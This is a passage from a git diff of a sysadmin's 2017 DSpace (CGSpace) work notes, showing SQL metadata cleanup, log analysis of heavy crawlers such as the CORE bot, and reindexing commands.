'10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
      +
      dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')));
       UPDATE 4899
       
      • Wow, I just wrote this baller regex facet to find duplicate authors:
      • @@ -370,7 +370,7 @@ java.io.StreamCorruptedException: invalid stream header: 00000000
      • Weird that these errors seem to have started on August 11th, the same day we had capacity issues with PostgreSQL:
      -
      # grep -c "ERROR net.sf.ehcache.store.DiskStore" dspace.log.2017-08-*
      +
      # grep -c "ERROR net.sf.ehcache.store.DiskStore" dspace.log.2017-08-*
       dspace.log.2017-08-01:0
       dspace.log.2017-08-02:0
       dspace.log.2017-08-03:0
      @@ -418,7 +418,7 @@ SELECT
           ?label 
       WHERE {  
          {  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . }
      -   FILTER regex(str(?label), "^fish", "i") .
      +   FILTER regex(str(?label), "^fish", "i") .
       } LIMIT 10;
       
       ┌───────────────────────┐                                                      
      @@ -452,7 +452,7 @@ WHERE {
       
    • Since I cleared the XMLUI cache on 2017-08-17 there haven’t been any more ERROR net.sf.ehcache.store.DiskStore errors
    • Look at the CGIAR Library to see if I can find the items that have been submitted since May:
    -
    dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z';
    +
    dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z';
      metadata_value_id | item_id | metadata_field_id |      text_value      | text_lang | place | authority | confidence 
     -------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
                 123117 |    5872 |                11 | 2017-06-28T13:05:18Z |           |     1 |           |         -1
    @@ -465,7 +465,7 @@ WHERE {
     
  • According to dc.date.accessioned (metadata field id 11) there have only been five items submitted since May
  • These are their handles:
  • -
    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
    +
    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
        handle   
     ------------
      10947/4658
    diff --git a/docs/2017-09/index.html b/docs/2017-09/index.html
    index dc65e3a42..23fa52961 100644
    --- a/docs/2017-09/index.html
    +++ b/docs/2017-09/index.html
    @@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
     
     Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is both in the approvers step as well as the group
     "/>
    -
    +
     
     
         
    @@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account
     
    • Delete 58 blank metadata values from the CGSpace database:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     DELETE 58
     
    • I also ran it on DSpace Test because we’ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate
    • @@ -145,7 +145,7 @@ DELETE 58
    • There will need to be some metadata updates for that as well (though if I recall correctly it is only about seven records). I had made some notes about it in 2017-07, but I’ve asked for more clarification from Lili just in case
    • Looking at the DSpace logs to see if we’ve had a change in the “Cannot get a connection” errors since last month when we adjusted the db.maxconnections parameter on CGSpace:
    -
    # grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-09-*
    +
    # grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-09-*
     dspace.log.2017-09-01:0
     dspace.log.2017-09-02:0
     dspace.log.2017-09-03:9
    @@ -174,7 +174,7 @@ dspace.log.2017-09-10:0
     
  • The import process takes the same amount of time with and without the caching
  • Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):
  • -
    $ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
    +
    $ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
     
    • Great TCP dump guide here: https://danielmiessler.com/study/tcpdump
    • The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation
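To make the filter less magic: `0x47455420` is simply the ASCII bytes for `GET ` (with the trailing space), and `tcp[32:4]` reads four bytes at offset 32 from the start of the TCP header. That only lands on the start of the payload when the TCP header is 32 bytes long (commonly a 20-byte base header plus 12 bytes of options), which is an assumption built into the filter. A minimal Python sketch of the same check, where `looks_like_http_get` and the fake segment are hypothetical names made up for illustration:

```python
import struct

# The constant the tcpdump filter compares against: ASCII "GET " as one 32-bit word.
GET_MAGIC = 0x47455420


def looks_like_http_get(tcp_segment: bytes, header_len: int = 32) -> bool:
    """Mimic the tcpdump expression `tcp[32:4] = 0x47455420` on a raw TCP segment.

    header_len=32 is the assumption baked into the filter (20-byte base
    header plus 12 bytes of options); other header sizes will not match.
    """
    if len(tcp_segment) < header_len + 4:
        return False
    # "!I" = network byte order (big-endian) unsigned 32-bit integer.
    (word,) = struct.unpack_from("!I", tcp_segment, header_len)
    return word == GET_MAGIC


if __name__ == "__main__":
    # Show which bytes the magic number stands for.
    print(GET_MAGIC.to_bytes(4, "big"))
    # A made-up segment: 32 zero bytes standing in for the TCP header, then a request line.
    fake_segment = bytes(32) + b"GET /schema.xsd HTTP/1.1\r\n"
    print(looks_like_http_get(fake_segment))
```

A request sent over a connection without TCP options (20-byte header) would slip past this filter, so a capture of only one packet is suggestive rather than conclusive.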
    • @@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
    • I wonder what was going on, and looking into the nginx logs I think maybe it’s OAI…
    • Here is yesterday’s top ten IP addresses making requests to /oai:
    -
    # awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
           1 213.136.89.78
           1 66.249.66.90
           1 66.249.66.92
    @@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
     
    • Compared to the previous day’s logs it looks VERY high:
    -
    # awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
           1 207.46.13.39
           1 66.249.66.93
           2 66.249.66.91
    @@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
     
     
  • And this user agent has never been seen before today (or at least recently!):
  • -
    # grep -c "API scraper" /var/log/nginx/oai.log
    +
    # grep -c "API scraper" /var/log/nginx/oai.log
     62088
    -# zgrep -c "API scraper" /var/log/nginx/oai.log.*.gz
    +# zgrep -c "API scraper" /var/log/nginx/oai.log.*.gz
     /var/log/nginx/oai.log.10.gz:0
     /var/log/nginx/oai.log.11.gz:0
     /var/log/nginx/oai.log.12.gz:0
    @@ -270,7 +270,7 @@ dspace.log.2017-09-10:0
     
  • Some of these heavy users are also using XMLUI, and their user agent isn’t matched by the Tomcat Session Crawler valve, so each request uses a different session
  • Yesterday alone the IP addresses using the API scraper user agent were responsible for nearly 16,000 sessions in XMLUI:
  • -
    # grep -a -E "(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)" /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep -a -E "(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)" /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     15924
     
    • If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex
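The session count above can also be sketched in Python, which makes it easy to escape the dots in the IP addresses (the `grep -E` pattern treats `.` as "any character") and to reuse the logic on other days. This is only a rough equivalent under assumptions: `count_sessions` is a hypothetical helper, and the sample log lines are invented for illustration rather than copied from a real `dspace.log`:

```python
import re

# The four scraper addresses from the grep command above.
SCRAPER_IPS = ["54.70.51.7", "35.161.215.53", "34.211.17.113", "54.70.175.86"]

# Escape the dots and refuse matches that are part of a longer address.
IP_RE = re.compile(
    r"(?<![0-9.])(?:" + "|".join(re.escape(ip) for ip in SCRAPER_IPS) + r")(?![0-9.])"
)
SESSION_RE = re.compile(r"session_id=([A-Z0-9]{32})")


def count_sessions(lines):
    """Count distinct session IDs on log lines that mention a scraper IP."""
    sessions = set()
    for line in lines:
        if IP_RE.search(line):
            sessions.update(SESSION_RE.findall(line))
    return len(sessions)


if __name__ == "__main__":
    # Invented sample lines; the real log format may differ.
    sample = [
        "INFO anonymous:session_id=" + "A" * 32 + ":ip_addr=54.70.51.7:view_item",
        "INFO anonymous:session_id=" + "B" * 32 + ":ip_addr=54.70.51.7:view_item",
        "INFO anonymous:session_id=" + "A" * 32 + ":ip_addr=35.161.215.53:view_item",
        "INFO anonymous:session_id=" + "C" * 32 + ":ip_addr=10.0.0.1:view_item",
    ]
    print(count_sessions(sample))
```

To run it against a real log, something like `count_sessions(open(path, errors="replace"))` should work, with `errors="replace"` playing the role of grep's `-a` flag for lines that are not valid text.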
    • @@ -282,7 +282,7 @@ dspace.log.2017-09-10:0
    • Looking at the spreadsheet with deletions and corrections that CCAFS sent last week
    • It appears they want to delete a lot of metadata, and I’m not sure they realize the implications:
    -
    dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;                                                                                                                                                                                                                  
    +
    dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;                                                                                                                                                                                                                  
             text_value        | count                              
     --------------------------+-------                             
      FP4_ClimateModels        |     6                              
    @@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
     
  • I sent CCAFS people an email to ask if they really want to remove these 200+ tags
  • She responded yes, so I’ll at least need to do these deletes in PostgreSQL:
  • -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
     DELETE 207
     
    • When we discussed this in late July there were some other renames they had requested, but I don’t see them in the current spreadsheet so I will have to follow that up
    • I talked to Macaroni Bros and they said to just go ahead with the other corrections as well, as their spreadsheet evolved organically rather than systematically!
    • The final list of corrections and deletes should therefore be:
    -
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    -update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    -update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
    +
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    +update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    +update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
     
    • Create and merge pull request to shut up the Ehcache update check (#337)
    • Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): https://jira.duraspace.org/browse/DS-1492
    • @@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
    • Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database
    • Here are all my distinct authority combinations in the database before:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • And then after adding a new item and selecting an existing “Orth, Alan” with an ORCID in the author lookup:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • It created a new authority… let’s try to add another item and select the same existing author and see what happens in the database:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • No new one… so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence 
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
     
    • Shit, it created another authority! Let’s try it again!
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';                                                                                             
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';                                                                                             
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
    @@ -439,19 +439,19 @@ DELETE 207
     
  • We still need to do the changes to config.dct and regenerate the sitebndl.zip to send to the Handle.net admins
  • According to this dspace-tech mailing list entry from 2011, we need to add the extra handle prefixes to config.dct like this:
  • -
    "server_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +
    "server_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    -"replication_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +"replication_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    -"backup_admins" = (
    -"300:0.NA/10568"
    -"300:0.NA/10947"
    +"backup_admins" = (
    +"300:0.NA/10568"
    +"300:0.NA/10947"
     )
     
    • More work on the CGIAR Library migration test run locally, as I was having problems importing the last fourteen items from the CGIAR System Management Office community
    • @@ -494,7 +494,7 @@ DELETE 207
    • Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite
    • Force thumbnail regeneration for the CGIAR System Organization’s Historic Archive community (2000 items):
    -
    $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p "ImageMagick PDF Thumbnail"
    +
    $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p "ImageMagick PDF Thumbnail"
     
    • I’m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org
    @@ -552,7 +552,7 @@ DELETE 207
  • Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org
  • Peter wants me to clean up the text values for Delia Grace’s metadata, as the authorities are all messed up again since we cleaned them up in 2016-12:
  • -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';                                  
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';                                  
       text_value  |              authority               | confidence              
     --------------+--------------------------------------+------------             
      Grace, Delia |                                      |        600              
    @@ -563,12 +563,12 @@ DELETE 207
     
  • Strangely, none of her authority entries have ORCIDs anymore…
  • I’ll just fix the text values and forget about it for now:
  • -
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     UPDATE 610
     
    • After this we have to reindex the Discovery and Authority cores (as tomcat7 user):
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
     
     real    83m56.895s
    diff --git a/docs/2017-10/index.html b/docs/2017-10/index.html
    index 8e843e148..549987651 100644
    --- a/docs/2017-10/index.html
    +++ b/docs/2017-10/index.html
    @@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
     There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
     Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
     "/>
    -
    +
     
     
         
    @@ -140,7 +140,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
     
  • I thought maybe his account had expired (seeing as it was the first of the month) but he says he was finally able to log in today
  • The logs for yesterday show fourteen errors related to LDAP auth failures:
  • -
    $ grep -c "ldap_authentication:type=failed_auth" dspace.log.2017-10-01
    +
    $ grep -c "ldap_authentication:type=failed_auth" dspace.log.2017-10-01
     14
     
    • For what it’s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET’s LDAP server
    • @@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • Twice in the past twenty-four hours Linode has warned that CGSpace’s outbound traffic rate was exceeding the notification threshold
    • I had a look at yesterday’s OAI and REST logs in /var/log/nginx but didn’t see anything unusual:
    -
    # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +
    # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
         141 157.55.39.240
         145 40.77.167.85
         162 66.249.66.92
    @@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
        1495 50.116.102.77
        3904 70.32.83.92
        9904 45.5.184.196
    -# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
    +# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
           5 66.249.66.71
           6 66.249.66.67
           6 68.180.229.31
    @@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
     
  • Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again
  • Still not sure where the load is coming from right now, but it’s clear why there were so many alerts yesterday on the 25th!
  • -
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
     18022
     
    • Compared to other days there were two or three times the number of requests yesterday!
    -
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
    +
    # grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
     3141
    -# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
    +# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
     7851
     
    • I still have no idea what was causing the load to go up today
    • @@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • I’m still not sure why this started causing alerts so repeatedly the past week
    • I don’t see any telltale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:
    -
    # grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    # grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2049
     
    • So there were 2049 unique sessions during the hour of 2AM
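The session counts in these notes all follow the same grep, sort, and count pattern, so it can be wrapped in a small function. This is a minimal sketch, not a script from the original notes: the name `count_unique_sessions` is hypothetical, and it assumes the `session_id=<32 characters>` format seen in the DSpace logs. One caveat: a pipeline that omits `-o` deduplicates whole log lines rather than session IDs, so the sketch always extracts the ID first.

```shell
#!/bin/sh
# Hypothetical helper (not part of DSpace or of the original notes).
# Counts distinct Tomcat session IDs in a DSpace log file.
#   $1: log file
#   $2: optional fixed string that a line must contain (an IP address,
#       or a timestamp prefix such as '2017-10-29 02:')
count_unique_sessions() {
    log_file=$1
    filter=${2:-}
    # An empty fixed-string pattern matches every line, so omitting $2
    # counts sessions across the whole file.
    grep -F -- "$filter" "$log_file" \
        | grep -o -E 'session_id=[A-Z0-9]{32}' \
        | sort -u \
        | wc -l \
        | tr -d ' '
}

# Example calls (file names assume the dspace.log.YYYY-MM-DD convention):
# count_unique_sessions dspace.log.2017-10-29 '2017-10-29 02:'
# count_unique_sessions dspace.log.2017-10-30 '190.19.92.5'
```

Using `grep -F` for the filter means dots in an IP address are matched literally instead of as regex wildcards.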
    • @@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • I think I’ll need to enable access logging in nginx to figure out what’s going on
    • After enabling logging on requests to XMLUI on / I see some new bot I’ve never seen before:
    -
    137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] "GET /discover?filtertype_0=type&filter_relational_operator_0=equals&filter_0=Internal+Document&filtertype=author&filter_relational_operator=equals&filter=CGIAR+Secretariat HTTP/1.1" 200 7776 "-" "Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)"
    +
    137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] "GET /discover?filtertype_0=type&filter_relational_operator_0=equals&filter_0=Internal+Document&filtertype=author&filter_relational_operator=equals&filter=CGIAR+Secretariat HTTP/1.1" 200 7776 "-" "Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)"
     
    • CORE seems to be some bot that is “Aggregating the world’s open access research papers”
    • The contact address listed in their bot’s user agent is incorrect; the correct page is simply: https://core.ac.uk/contact
    • @@ -329,20 +329,20 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
    • Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:
    -
    # grep -c "CORE/0.6" /var/log/nginx/access.log 
    +
    # grep -c "CORE/0.6" /var/log/nginx/access.log 
     26475
    -# grep -c "CORE/0.6" /var/log/nginx/access.log.1
    +# grep -c "CORE/0.6" /var/log/nginx/access.log.1
     135083
     
    • IP addresses for this bot currently seem to be:
    -
    # grep "CORE/0.6" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
    +
    # grep "CORE/0.6" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
     137.108.70.6
     137.108.70.7
     
    • I will add their user agent to the Tomcat Crawler Session Manager Valve but it won’t help much because they are only using two sessions:
    -
    # grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
    +
    # grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
     session_id=5771742CABA3D0780860B8DA81E0551B
     session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
      @@ -350,12 +350,12 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    # grep -c 137.108.70 /var/log/nginx/access.log
     26622
    -# grep 137.108.70 /var/log/nginx/access.log | grep -c "GET /discover"
    +# grep 137.108.70 /var/log/nginx/access.log | grep -c "GET /discover"
     24055
     
    • Just because I’m curious who the top IPs are:
    -
